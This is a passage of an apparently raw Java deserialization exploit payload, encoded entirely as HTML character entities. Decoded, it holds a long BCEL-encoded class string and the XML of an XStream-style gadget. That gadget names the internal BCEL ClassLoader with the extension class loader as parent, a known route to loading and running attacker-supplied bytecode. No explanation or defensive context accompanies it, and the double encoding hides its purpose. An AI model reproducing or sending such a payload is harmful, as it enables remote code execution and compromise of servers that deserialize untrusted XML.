&#84;&#36;&#102;&#57;&#36;&#100;&#50;&#36;&#54;&#48;&#36;&#100;&#56;&#36;&#98;&#54;&#101;&#36;&#100;&#51;&#36;&#57;&#98;&#36;&#100;&#55;&#101;&#36;&#100;&#48;&#36;&#97;&#48;&#36;&#101;&#56;&#36;&#57;&#101;&#36;&#102;&#52;&#36;&#98;&#98;&#36;&#97;&#56;&#36;&#101;&#52;&#36;&#115;&#36;&#116;&#80;&#36;&#102;&#53;&#36;&#85;&#36;&#101;&#100;&#122;&#36;&#100;&#98;&#36;&#100;&#50;&#36;&#56;&#100;&#76;&#36;&#97;&#54;&#36;&#100;&#48;&#36;&#108;&#36;&#99;&#53;&#109;&#36;&#53;&#98;&#36;&#100;&#52;&#53;&#84;&#36;&#57;&#48;&#36;&#100;&#54;&#36;&#100;&#48;&#68;&#36;&#110;&#79;&#36;&#99;&#97;&#110;&#36;&#57;&#97;&#36;&#101;&#99;&#36;&#97;&#53;&#36;&#97;&#50;&#36;&#97;&#54;&#36;&#98;&#53;&#36;&#56;&#100;&#36;&#102;&#101;&#36;&#113;&#89;&#36;&#104;&#89;&#36;&#57;&#55;&#48;&#36;&#57;&#50;&#36;&#100;&#52;&#77;&#36;&#102;&#51;&#102;&#114;&#54;&#82;&#36;&#97;&#51;&#90;&#36;&#102;&#49;&#36;&#101;&#50;&#36;&#57;&#57;&#36;&#98;&#51;&#36;&#95;&#36;&#101;&#51;&#36;&#89;&#36;&#97;&#52;&#36;&#98;&#51;&#36;&#57;&#50;&#114;&#69;&#102;&#36;&#97;&#53;&#36;&#78;&#36;&#100;&#98;&#36;&#97;&#49;&#36;&#56;&#97;&#36;&#97;&#102;&#116;&#36;&#97;&#99;&#78;&#107;&#36;&#99;&#56;&#36;&#98;&#48;&#36;&#53;&#98;&#99;&#36;&#100;&#99;&#36;&#57;&#102;&#57;&#36;&#99;&#49;&#36;&#57;&#50;&#36;&#112;&#85;&#36;&#100;&#52;&#36;&#118;&#120;&#36;&#98;&#49;&#36;&#56;&#52;&#73;&#36;&#55;&#101;&#36;&#53;&#99;&#48;&#36;&#55;&#100;&#36;&#77;&#36;&#98;&#55;&#82;&#36;&#56;&#52;&#36;&#97;&#51;&#36;&#98;&#99;&#36;&#74;&#76;&#36;&#100;&#100;&#104;&#36;&#53;&#99;&#36;&#98;&#97;&#36;&#97;&#53;&#36;&#99;&#56;&#36;&#102;&#51;&#36;&#101;&#101;&#36;&#121;&#36;&#97;&#53;&#36;&#116;&#69;&#36;&#57;&#56;&#36;&#83;&#36;&#97;&#102;&#36;&#56;&#100;&#36;&#99;&#50;&#36;&#97;&#54;&#36;&#98;&#54;&#72;&#36;&#99;&#49;&#36;&#69;&#36;&#57;&#57;&#52;&#120;&#120;&#36;&#98;&#53;&#49;&#36;&#69;&#36;&#56;&#51;&#36;&#114;&#36;&#67;&#36;&#51;&#97;&#36;&#102;&#100;&#36;&#99;&#52;&#68;&#36;&#51;&#99;&#36;&#101;&#57;&#36;&#99;&#52;&#36;&#121;&#36;&#56;&#50;&#36;&#122;&#36;&#56;&#97;&#36;&#101;&#53;&#36;&#100;&#99;&#36;&#67;&#116;&#113;&#36;&#57;&#48;&#73;&#116;&#36;&#53;&#101;&#36;&#98;&#48;&#36;&#113;&#36;&#56;&#51;&#95;&#36;&#51;&#101;&#53;&#83;&#36;&#97;&#99;&#36;&#102;&#99;&#36;&#57;&#56;&#116;&#36;&#97;&#57;&#36;&#97;&#50;&#36;&#51;&#98;&#36;&#104;&#36;&#101;&#56;&#36;&#51;&#101;&#36;&#97;&#50;&#36;&#99;&#98;&#36;&#119;&#36;&#57;&#54;&#78;&#36;&#104;&#36;&#102;&#99;&#36;&#102;&#101;&#36;&#74;&#36;&#57;&#100;&#36;&#100;&#55;&#36;&#102;&#100;&#51;&#49;&#72;&#121;&#36;&#99;&#99;&#36;&#105;&#36;&#97;&#98;&#48;&#36;&#101;&#53;&#36;&#55;&#100;&#36;&#85;&#36;&#111;&#36;&#57;&#97;&#115;&#36;&#100;&#99;&#36;&#102;&#98;&#36;&#57;&#57;&#36;&#84;&#36;&#56;&#97;&#36;&#56;&#55;&#36;&#101;&#100;&#36;&#57;&#50;&#115;&#36;&#54;&#48;&#79;&#121;&#36;&#101;&#100;&#36;&#100;&#55;&#36;&#98;&#51;&#36;&#98;&#54;&#77;&#101;&#36;&#53;&#99;&#36;&#89;&#36;&#97;&#52;&#36;&#99;&#53;&#36;&#74;&#36;&#99;&#98;&#83;&#73;&#36;&#97;&#99;&#36;&#56;&#97;&#36;&#56;&#50;&#67;&#51;&#36;&#112;&#36;&#90;&#36;&#97;&#51;&#36;&#102;&#49;&#36;&#51;&#102;&#81;&#36;&#113;&#36;&#101;&#55;&#36;&#98;&#50;&#36;&#98;&#102;&#36;&#97;&#56;&#36;&#97;&#54;&#36;&#98;&#56;&#36;&#115;&#106;&#36;&#57;&#100;&#102;&#36;&#57;&#100;&#36;&#97;&#98;&#77;&#36;&#98;&#56;&#69;&#36;&#101;&#57;&#36;&#74;&#110;&#36;&#101;&#49;&#36;&#97;&#49;&#36;&#118;&#36;&#116;&#36;&#101;&#52;&#36;&#98;&#51;&#36;&#36;&#36;&#101;&#51;&#36;&#56;&#50;&#36;&#112;&#36;&#97;&#53;&#36;&#97;&#54;&#36;&#97;&#102;&#36;&#100;&#48;&#111;&#36;&#100;&#57;&#36;&#53;&#100;&#49;&#36;&#57;&#101;&#36;&#102;&#57;&#36;&#114;&#36;&#101;&#55;&#36;&#100;&#48;&#36;&#101;&#102;&#36;&#79;&#75;&#36;&#107;&#55;&#82;&#36;&#101;&#48;&#36;&#98;&#101;&#36;&#102;&#51;&#36;&#101;&#52;&#36;&#57;&#52;&#36;&#83;&#36;&#81;&#72;&#36;&#109;&#36;&#80;&#89;&#36;&#51;&#100;&#36;&#99;&#100;&#36;&#99;&#98;&#66;&#36;&#99;&#49;&#36;&#97;&#102;&#36;&#122;&#36;&#97;&#49;&#102;&#36;&#101;&#98;&#36;&#77;&#36;&#57;&#52;&#82;&#36;&#56;&#101;&#36;&#101;&#55;&#36;&#82;&#72;&#36;&#56;&#49;&#36;&#95;&#97;&#36;&#101;&#101;&#36;&#98;&#49;&#118;&#36;&#84;&#36;&#102;&#101;&#85;&#36;&#114;&#36;&#98;&#99;&#36;&#121;&#113;&#36;&#99;&#55;&#36;&#57;&#52;&#116;&#36;&#98;&#99;&#36;&#98;&#54;&#36;&#57;&#52;&#36;&#98;&#98;&#36;&#85;&#36;&#51;&#102;&#36;&#99;&#49;&#54;&#104;&#36;&#102;&#101;&#36;&#102;&#49;&#36;&#53;&#101;&#36;&#57;&#98;&#95;&#36;&#97;&#50;&#36;&#100;&#55;&#36;&#102;&#50;&#36;&#100;&#51;&#36;&#57;&#99;&#36;&#56;&#101;&#36;&#99;&#98;&#113;&#119;&#36;&#101;&#50;&#36;&#101;&#55;&#36;&#102;&#55;&#52;&#36;&#99;&#57;&#75;&#36;&#97;&#49;&#109;&#109;&#36;&#97;&#49;&#36;&#57;&#57;&#36;&#85;&#36;&#100;&#99;&#36;&#100;&#97;&#36;&#101;&#50;&#86;&#36;&#121;&#36;&#56;&#53;&#36;&#97;&#50;&#101;&#36;&#57;&#102;&#99;&#100;&#120;&#36;&#97;&#50;&#36;&#53;&#99;&#36;&#56;&#101;&#36;&#99;&#102;&#112;&#36;&#97;&#55;&#36;&#51;&#100;&#36;&#51;&#102;&#75;&#36;&#111;&#36;&#97;&#53;&#36;&#98;&#97;&#36;&#51;&#97;&#36;&#51;&#102;&#102;&#76;&#36;&#99;&#51;&#36;&#56;&#57;&#108;&#36;&#101;&#101;&#36;&#101;&#101;&#36;&#57;&#99;&#36;&#98;&#56;&#36;&#104;&#36;&#99;&#56;&#36;&#99;&#48;&#68;&#36;&#97;&#54;&#36;&#122;&#36;&#57;&#53;&#36;&#101;&#54;&#36;&#97;&#51;&#36;&#56;&#49;&#36;&#51;&#101;&#36;&#99;&#102;&#36;&#97;&#56;&#54;&#36;&#102;&#100;&#36;&#56;&#52;&#36;&#105;&#36;&#99;&#100;&#36;&#100;&#50;&#36;&#98;&#52;&#36;&#100;&#48;&#36;&#102;&#51;&#73;&#36;&#102;&#49;&#36;&#114;&#36;&#100;&#100;&#36;&#66;&#36;&#101;&#97;&#36;&#98;&#50;&#36;&#51;&#98;&#36;&#89;&#36;&#36;&#36;&#77;&#118;&#36;&#102;&#99;&#36;&#101;&#102;&#36;&#36;&#36;&#99;&#48;&#66;&#36;&#102;&#97;&#36;&#53;&#101;&#36;&#56;&#99;&#36;&#56;&#48;&#36;&#102;&#102;&#36;&#57;&#52;&#36;&#100;&#51;&#36;&#116;&#36;&#83;&#36;&#55;&#100;&#36;&#119;&#36;&#100;&#49;&#36;&#98;&#97;&#36;&#56;&#57;&#118;&#36;&#88;&#36;&#100;&#49;&#36;&#57;&#51;&#36;&#98;&#101;&#36;&#57;&#97;&#36;&#101;&#48;&#36;&#53;&#100;&#54;&#36;&#67;&#36;&#102;&#54;&#36;&#69;&#36;&#102;&#56;&#36;&#102;&#55;&#36;&#100;&#51;&#36;&#102;&#53;&#36;&#98;&#52;&#36;&#102;&#97;&#36;&#53;&#99;&#98;&#36;&#70;&#36;&#113;&#36;&#55;&#101;&#67;&#36;&#97;&#49;&#36;&#56;&#99;&#36;&#56;&#98;&#36;&#57;&#54;&#36;&#100;&#102;&#36;&#67;&#36;&#80;&#100;&#36;&#83;&#36;&#98;&#56;&#79;&#36;&#118;&#36;&#100;&#98;&#36;&#97;&#56;&#36;&#57;&#52;&#117;&#36;&#118;&#36;&#101;&#53;&#36;&#97;&#51;&#36;&#102;&#48;&#36;&#101;&#52;&#36;&#101;&#48;&#85;&#36;&#55;&#99;&#57;&#36;&#73;&#36;&#72;&#49;&#36;&#99;&#102;&#119;&#36;&#69;&#98;&#95;&#36;&#98;&#57;&#82;&#36;&#82;&#36;&#101;&#100;&#36;&#102;&#51;&#36;&#117;&#82;&#36;&#98;&#52;&#36;&#99;&#102;&#36;&#98;&#98;&#36;&#121;&#36;&#51;&#97;&#36;&#56;&#99;&#36;&#100;&#97;&#36;&#74;&#98;&#36;&#114;&#36;&#116;&#36;&#99;&#97;&#36;&#36;&#81;&#36;&#102;&#51;&#36;&#56;&#99;&#36;&#99;&#50;&#36;&#97;&#102;&#36;&#100;&#50;&#36;&#99;&#49;&#89;&#36;&#57;&#100;&#36;&#99;&#98;&#115;&#36;&#57;&#56;&#36;&#97;&#100;&#121;&#36;&#99;&#55;&#80;&#36;&#100;&#53;&#36;&#97;&#55;&#122;&#71;&#80;&#36;&#97;&#100;&#36;&#102;&#57;&#36;&#99;&#54;&#36;&#97;&#48;&#36;&#102;&#52;&#36;&#97;&#57;&#36;&#98;&#101;&#36;&#82;&#36;&#100;&#52;&#104;&#36;&#56;&#50;&#36;&#119;&#36;&#101;&#52;&#48;&#36;&#97;&#55;&#111;&#36;&#101;&#51;&#113;&#36;&#97;&#56;&#99;&#36;&#97;&#56;&#36;&#101;&#100;&#36;&#104;&#65;&#36;&#53;&#100;&#36;&#117;&#36;&#56;&#55;&#36;&#98;&#57;&#36;&#57;&#55;&#36;&#100;&#50;&#95;&#36;&#79;&#36;&#102;&#51;&#36;&#98;&#97;&#36;&#56;&#54;&#36;&#99;&#55;&#95;&#36;&#76;&#36;&#118;&#101;&#57;&#36;&#97;&#56;&#36;&#102;&#55;&#67;&#36;&#79;&#36;&#118;&#36;&#102;&#51;&#36;&#101;&#57;&#36;&#101;&#53;&#36;&#109;&#36;&#112;&#107;&#36;&#102;&#99;&#36;&#99;&#98;&#114;&#36;&#98;&#56;&#36;&#109;&#36;&#56;&#102;&#36;&#101;&#97;&#113;&#81;&#36;&#51;&#100;&#36;&#105;&#36;&#100;&#53;&#36;&#101;&#98;&#36;&#97;&#50;&#122;&#57;&#36;&#97;&#97;&#79;&#36;&#102;&#53;&#36;&#98;&#100;&#49;&#36;&#101;&#97;&#48;&#36;&#57;&#101;&#36;&#100;&#50;&#36;&#51;&#99;&#36;&#99;&#97;&#36;&#102;&#99;&#36;&#97;&#101;&#36;&#98;&#51;&#36;&#100;&#49;&#113;&#36;&#101;&#56;&#36;&#102;&#102;&#36;&#56;&#51;&#36;&#98;&#101;&#36;&#53;&#100;&#36;&#84;&#103;&#36;&#52;&#48;&#95;&#87;&#36;&#69;&#36;&#53;&#100;&#36;&#101;&#49;&#66;&#87;&#112;&#104;&#36;&#99;&#57;&#36;&#56;&#53;&#36;&#57;&#54;&#56;&#116;&#36;&#97;&#53;&#90;&#36;&#102;&#57;&#36;&#99;&#54;&#36;&#100;&#48;&#36;&#97;&#97;&#36;&#102;&#56;&#116;&#36;&#101;&#56;&#113;&#36;&#99;&#97;&#36;&#56;&#102;&#36;&#80;&#36;&#102;&#98;&#36;&#101;&#57;&#107;&#36;&#101;&#57;&#66;&#36;&#102;&#101;&#100;&#36;&#56;&#100;&#36;&#57;&#52;&#36;&#99;&#49;&#87;&#112;&#36;&#57;&#97;&#36;&#51;&#102;&#89;&#36;&#112;&#107;&#114;&#36;&#102;&#55;&#101;&#110;&#118;&#36;&#101;&#102;&#36;&#99;&#49;&#98;&#90;&#36;&#102;&#100;&#84;&#36;&#75;&#36;&#98;&#51;&#72;&#36;&#98;&#50;&#36;&#103;&#36;&#100;&#55;&#36;&#54;&#48;&#36;&#79;&#36;&#100;&#97;&#36;&#101;&#57;&#36;&#100;&#102;&#36;&#56;&#51;&#36;&#36;&#36;&#100;&#52;&#36;&#97;&#49;&#36;&#80;&#115;&#36;&#82;&#36;&#56;&#55;&#36;&#75;&#36;&#84;&#36;&#102;&#51;&#36;&#74;&#107;&#36;&#66;&#36;&#79;&#36;&#109;&#36;&#56;&#48;&#36;&#72;&#36;&#97;&#56;&#36;&#55;&#99;&#36;&#107;&#65;&#36;&#51;&#100;&#36;&#107;&#36;&#99;&#51;&#36;&#111;&#36;&#105;&#36;&#99;&#54;&#36;&#83;&#36;&#102;&#97;&#36;&#99;&#101;&#108;&#36;&#99;&#48;&#36;&#99;&#98;&#36;&#73;&#36;&#98;&#97;&#36;&#57;&#97;&#36;&#53;&#101;&#36;&#97;&#53;&#36;&#83;&#36;&#51;&#97;&#77;&#114;&#36;&#102;&#102;&#36;&#113;&#36;&#98;&#57;&#36;&#102;&#102;&#36;&#54;&#48;&#36;&#110;&#36;&#120;&#67;&#36;&#51;&#100;&#36;&#102;&#51;&#99;&#36;&#82;&#36;&#57;&#98;&#36;&#56;&#55;&#36;&#114;&#36;&#97;&#99;&#36;&#107;&#36;&#78;&#36;&#101;&#99;&#74;&#36;&#69;&#73;&#36;&#102;&#51;&#36;&#67;&#36;&#98;&#54;&#36;&#74;&#36;&#66;&#36;&#100;&#54;&#75;&#36;&#102;&#99;&#109;&#36;&#99;&#52;&#36;&#108;&#36;&#113;&#36;&#55;&#101;&#36;&#56;&#54;&#36;&#102;&#56;&#36;&#98;&#55;&#36;&#84;&#36;&#102;&#102;&#36;&#53;&#101;&#36;&#121;&#101;&#36;&#72;&#36;&#98;&#48;&#36;&#77;&#81;&#36;&#98;&#50;&#36;&#101;&#56;&#36;&#77;&#36;&#97;&#97;&#36;&#99;&#101;&#36;&#54;&#48;&#57;&#36;&#69;&#36;&#102;&#52;&#36;&#100;&#48;&#36;&#101;&#102;&#36;&#78;&#36;&#67;&#54;&#36;&#56;&#102;&#36;&#57;&#51;&#36;&#111;&#36;&#100;&#49;&#36;&#100;&#100;&#36;&#100;&#101;&#36;&#57;&#56;&#36;&#116;&#36;&#83;&#77;&#36;&#52;&#48;&#36;&#97;&#102;&#36;&#56;&#48;&#36;&#57;&#98;&#36;&#69;&#50;&#36;&#85;&#36;&#101;&#51;&#36;&#97;&#52;&#36;&#100;&#55;&#51;&#36;&#57;&#100;&#36;&#78;&#84;&#36;&#57;&#102;&#36;&#99;&#49;&#36;&#97;&#50;&#73;&#36;&#56;&#57;&#36;&#55;&#102;&#97;&#36;&#99;&#49;&#56;&#36;&#98;&#57;&#36;&#99;&#99;&#69;&#36;&#115;&#36;&#52;&#48;&#36;&#99;&#49;&#36;&#69;&#108;&#36;&#97;&#57;&#36;&#104;&#36;&#116;&#36;&#51;&#102;&#36;&#56;&#52;&#98;&#36;&#100;&#56;&#73;&#36;&#99;&#99;&#36;&#100;&#50;&#103;&#36;&#98;&#54;&#36;&#56;&#101;&#36;&#97;&#51;&#36;&#71;&#36;&#86;&#36;&#100;&#51;&#104;&#36;&#102;&#52;&#67;&#84;&#110;&#36;&#99;&#50;&#36;&#111;&#36;&#99;&#56;&#36;&#99;&#53;&#36;&#115;&#36;&#98;&#56;&#36;&#57;&#99;&#36;&#98;&#51;&#36;&#97;&#99;&#36;&#121;&#36;&#55;&#100;&#36;&#98;&#52;&#88;&#36;&#78;&#112;&#51;&#36;&#102;&#100;&#121;&#36;&#97;&#56;&#36;&#102;&#51;&#36;&#98;&#54;&#36;&#100;&#49;&#36;&#102;&#102;&#107;&#36;&#100;&#98;&#36;&#76;&#36;&#122;&#90;&#36;&#100;&#101;&#65;&#36;&#98;&#98;&#36;&#98;&#57;&#36;&#57;&#52;&#36;&#99;&#51;&#36;&#57;&#55;&#70;&#113;&#36;&#100;&#49;&#36;&#71;&#36;&#101;&#53;&#98;&#101;&#65;&#36;&#79;&#36;&#56;&#49;&#36;&#99;&#101;&#36;&#101;&#53;&#36;&#100;&#52;&#65;&#36;&#76;&#36;&#57;&#55;&#83;&#36;&#100;&#100;&#36;&#100;&#52;&#111;&#84;&#36;&#87;&#36;&#56;&#100;&#98;&#49;&#36;&#57;&#53;&#36;&#101;&#99;&#36;&#83;&#36;&#97;&#50;&#107;&#36;&#107;&#36;&#100;&#53;&#36;&#99;&#51;&#57;&#36;&#97;&#97;&#36;&#56;&#55;&#36;&#56;&#97;&#36;&#97;&#51;&#36;&#102;&#101;&#36;&#90;&#52;&#36;&#100;&#48;&#36;&#97;&#102;&#36;&#101;&#54;&#85;&#36;&#36;&#36;&#110;&#36;&#74;&#36;&#53;&#101;&#36;&#57;&#102;&#74;&#36;&#57;&#48;&#36;&#99;&#98;&#80;&#115;&#113;&#36;&#90;&#36;&#97;&#53;&#76;&#36;&#84;&#85;&#36;&#97;&#102;&#86;&#36;&#97;&#49;&#86;&#36;&#105;&#36;&#53;&#100;&#36;&#122;&#36;&#57;&#53;&#36;&#97;&#102;&#36;&#97;&#101;&#36;&#97;&#99;&#36;&#97;&#100;&#36;&#97;&#99;&#36;&#57;&#53;&#36;&#107;&#102;&#36;&#57;&#54;&#90;&#81;&#36;&#53;&#98;&#36;&#98;&#57;&#74;&#36;&#57;&#51;&#85;&#36;&#102;&#57;&#56;&#36;&#100;&#98;&#36;&#97;&#54;&#36;&#75;&#36;&#97;&#97;&#76;&#56;&#36;&#57;&#97;&#95;&#36;&#102;&#53;&#36;&#108;&#103;&#36;&#101;&#98;&#85;&#36;&#55;&#102;&#36;&#79;&#75;&#115;&#88;&#36;&#97;&#54;&#36;&#121;&#119;&#36;&#51;&#98;&#78;&#115;&#36;&#102;&#55;&#36;&#99;&#97;&#36;&#97;&#53;&#36;&#57;&#101;&#36;&#112;&#36;&#73;&#81;&#36;&#56;&#102;&#36;&#56;&#98;&#36;&#100;&#49;&#36;&#105;&#36;&#99;&#50;&#36;&#100;&#97;&#36;&#121;&#117;&#36;&#57;&#54;&#36;&#101;&#97;&#36;&#116;&#74;&#36;&#56;&#52;&#36;&#117;&#36;&#120;&#36;&#56;&#56;&#36;&#98;&#50;&#36;&#102;&#50;&#36;&#90;&#36;&#56;&#56;&#36;&#100;&#97;&#36;&#101;&#99;&#49;&#36;&#57;&#97;&#36;&#67;&#99;&#88;&#69;&#36;&#56;&#53;&#36;&#55;&#98;&#36;&#100;&#57;&#36;&#89;&#36;&#36;&#36;&#101;&#102;&#83;&#103;&#36;&#56;&#102;&#36;&#101;&#48;&#77;&#57;&#36;&#97;&#99;&#36;&#99;&#101;&#36;&#101;&#49;&#36;&#56;&#97;&#36;&#105;&#36;&#97;&#101;&#36;&#105;&#36;&#99;&#49;&#85;&#36;&#53;&#99;&#66;&#36;&#112;&#110;&#36;&#97;&#51;&#36;&#51;&#97;&#36;&#55;&#98;&#36;&#85;&#107;&#114;&#104;&#36;&#99;&#97;&#36;&#101;&#49;&#106;&#36;&#97;&#100;&#36;&#99;&#97;&#36;&#86;&#36;&#97;&#100;&#36;&#57;&#97;&#36;&#85;&#36;&#100;&#53;&#36;&#97;&#97;&#36;&#100;&#52;&#36;&#97;&#97;&#81;&#36;&#53;&#99;&#36;&#99;&#51;&#36;&#108;&#57;&#36;&#97;&#99;&#36;&#51;&#100;&#36;&#73;&#81;&#105;&#36;&#107;&#36;&#56;&#54;&#87;&#36;&#97;&#100;&#36;&#111;&#66;&#36;&#100;&#101;&#36;&#98;&#48;&#36;&#87;&#36;&#97;&#53;&#36;&#57;&#53;&#36;&#98;&#98;&#87;&#36;&#97;&#100;&#86;&#36;&#98;&#98;&#36;&#110;&#36;&#97;&#56;&#36;&#101;&#54;&#36;&#101;&#52;&#122;&#77;&#81;&#36;&#57;&#53;&#36;&#74;&#36;&#101;&#101;&#36;&#98;&#53;&#36;&#101;&#53;&#100;&#36;&#118;&#55;&#36;&#98;&#50;&#70;&#36;&#97;&#100;&#81;&#36;&#86;&#36;&#100;&#97;&#68;&#36;&#99;&#56;&#36;&#51;&#101;&#109;&#36;&#56;&#101;&#36;&#51;&#97;&#36;&#56;&#55;&#36;&#98;&#98;&#36;&#100;&#49;&#86;&#36;&#101;&#52;&#70;&#36;&#97;&#100;&#90;&#36;&#97;&#98;&#36;&#99;&#101;&#36;&#99;&#57;&#36;&#98;&#98;&#49;&#36;&#100;&#49;&#112;&#36;&#99;&#97;&#36;&#51;&#97;&#36;&#101;&#97;&#54;&#36;&#97;&#101;&#36;&#102;&#57;&#36;&#98;&#97;&#106;&#36;&#51;&#99;&#119;&#75;&#36;&#79;&#36;&#101;&#100;&#74;&#36;&#99;&#55;&#36;&#69;&#97;&#36;&#97;&#101;&#36;&#98;&#50;&#36;&#51;&#101;&#36;&#100;&#102;&#36;&#56;&#56;&#36;&#100;&#99;&#36;&#100;&#100;&#36;&#100;&#101;&#73;&#109;&#36;&#104;&#36;&#75;&#36;&#100;&#97;&#36;&#101;&#97;&#36;&#100;&#52;&#36;&#98;&#97;&#73;&#109;&#36;&#98;&#100;&#36;&#99;&#51;&#36;&#57;&#56;&#69;&#70;&#107;&#36;&#102;&#101;&#36;&#102;&#100;&#36;&#57;&#53;&#108;&#36;&#102;&#56;&#36;&#99;&#99;&#36;&#100;&#100;&#36;&#99;&#51;&#36;&#102;&#48;&#108;&#120;&#36;&#56;&#50;&#36;&#99;&#97;&#36;&#99;&#48;&#102;&#36;&#99;&#55;&#36;&#100;&#56;&#36;&#74;&#106;&#36;&#115;&#36;&#98;&#48;&#36;&#57;&#51;&#36;&#101;&#99;&#36;&#70;&#122;&#36;&#101;&#54;&#36;&#100;&#98;&#36;&#102;&#52;&#81;&#106;&#36;&#76;&#36;&#54;&#48;&#36;&#70;&#36;&#57;&#53;&#36;&#99;&#52;&#36;&#119;&#36;&#103;&#36;&#98;&#99;&#36;&#57;&#55;&#81;&#36;&#97;&#51;&#36;&#97;&#101;&#36;&#97;&#54;&#66;&#36;&#98;&#56;&#36;&#56;&#97;&#36;&#103;&#36;&#97;&#101;&#36;&#57;&#49;&#36;&#57;&#97;&#112;&#36;&#78;&#117;&#36;&#99;&#97;&#36;&#100;&#53;&#36;&#98;&#52;&#107;&#36;&#99;&#54;&#90;&#36;&#98;&#52;&#36;&#97;&#50;&#36;&#68;&#36;&#100;&#55;&#82;&#36;&#98;&#49;&#36;&#97;&#99;&#36;&#97;&#51;&#54;&#106;&#71;&#36;&#56;&#97;&#118;&#54;&#54;&#36;&#101;&#48;&#54;&#36;&#57;&#97;&#36;&#102;&#57;&#119;&#36;&#100;&#50;&#36;&#97;&#99;&#36;&#98;&#102;&#36;&#57;&#98;&#74;&#36;&#101;&#57;&#36;&#81;&#113;&#36;&#80;&#36;&#84;&#36;&#101;&#97;&#36;&#118;&#36;&#103;&#36;&#101;&#55;&#36;&#97;&#102;&#36;&#112;&#36;&#99;&#97;&#36;&#89;&#122;&#36;&#57;&#56;&#36;&#56;&#56;&#36;&#99;&#100;&#76;&#69;&#36;&#95;&#36;&#76;&#36;&#101;&#50;&#36;&#115;&#36;&#87;&#70;&#36;&#108;&#36;&#98;&#98;&#36;&#67;&#36;&#53;&#98;&#36;&#100;&#57;&#122;&#36;&#100;&#99;&#76;&#109;&#36;&#98;&#97;&#36;&#57;&#100;&#36;&#114;&#36;&#98;&#49;&#36;&#56;&#51;&#36;&#101;&#100;&#71;&#36;&#57;&#99;&#36;&#51;&#100;&#68;&#36;&#99;&#102;&#67;&#72;&#36;&#98;&#48;&#81;&#36;&#101;&#99;&#98;&#36;&#99;&#55;&#36;&#98;&#48;&#36;&#57;&#98;&#36;&#51;&#100;&#36;&#56;&#98;&#52;&#89;&#106;&#36;&#98;&#50;&#36;&#101;&#55;&#36;&#100;&#49;&#36;&#99;&#101;&#78;&#36;&#111;&#75;&#36;&#100;&#54;&#102;&#36;&#100;&#56;&#36;&#56;&#98;&#36;&#100;&#56;&#36;&#101;&#51;&#36;&#98;&#54;&#36;&#101;&#102;&#36;&#56;&#51;&#36;&#97;&#56;&#36;&#89;&#36;&#99;&#55;&#36;&#79;&#36;&#100;&#101;&#36;&#79;&#36;&#51;&#98;&#36;&#69;&#36;&#100;&#99;&#36;&#111;&#36;&#109;&#36;&#115;&#36;&#54;&#48;&#36;&#97;&#55;&#36;&#102;&#98;&#36;&#100;&#50;&#80;&#120;&#36;&#97;&#49;&#36;&#51;&#97;&#111;&#36;&#109;&#36;&#100;&#53;&#84;&#36;&#102;&#97;&#79;&#36;&#97;&#50;&#36;&#102;&#97;&#36;&#53;&#99;&#98;&#36;&#36;&#36;&#56;&#55;&#36;&#55;&#101;&#36;&#102;&#53;&#66;&#36;&#55;&#102;&#52;&#36;&#100;&#51;&#36;&#51;&#97;&#78;&#67;&#36;&#99;&#56;&#36;&#55;&#102;&#36;&#107;&#36;&#116;&#36;&#56;&#49;&#36;&#87;&#36;&#101;&#97;&#36;&#102;&#52;&#36;&#55;&#102;&#36;&#56;&#51;&#36;&#56;&#100;&#36;&#99;&#51;&#36;&#99;&#98;&#36;&#51;&#98;&#36;&#56;&#101;&#36;&#101;&#102;&#36;&#102;&#56;&#36;&#101;&#53;&#36;&#87;&#119;&#36;&#56;&#55;&#36;&#97;&#48;&#36;&#102;&#49;&#95;&#36;&#104;&#36;&#56;&#53;&#36;&#102;&#55;&#36;&#97;&#101;&#56;&#36;&#83;&#36;&#65;&#36;&#65;&#10;&#60;&#47;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#97;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#111;&#117;&#116;&#101;&#114;&#45;&#99;&#108;&#97;&#115;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#110;&#97;&#109;&#101;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#114;&#111;&#99;&#101;&#115;&#115;&#111;&#114;&#67;&#76;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#111;&#114;&#103;&#46;&#97;&#112;&#97;&#99;&#104;&#101;&#46;&#98;&#99;&#101;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#108;&#97;&#115;&#115;&#76;&#111;&#97;&#100;&#101;&#114;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#97;&#114;&#101;&#110;&#116;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#115;&#117;&#110;&#46;&#109;&#105;&#115;&#99;&#46;&#76;&#97;&#117;&#110;&#99;&#104;&#101;&#114;&#36;&#69;&#120;&#116;&#67;&#108;&#97;&#115;&#115;&#76;&#111;&#97;&#100;&#101;&#114;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#112;&#97;&#114;&#101;&#110;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#97;&#99;&#107;&#97;&#103;&#101;&#50;&#99;&#101;&#114;&#116;&#115;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#104;&#97;&#115;&#104;&#116;&#97;&#98;&#108;&#101;&#39;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#108;&#97;&#115;&#115;&#101;&#115;&#32;&#100;&#101;&#102;&#105;&#110;&#101;&#100;&#45;&#105;&#110;&#61;&#39;&#106;&#97;&#118;&#97;&#46;&#108;&#97;&#110;&#103;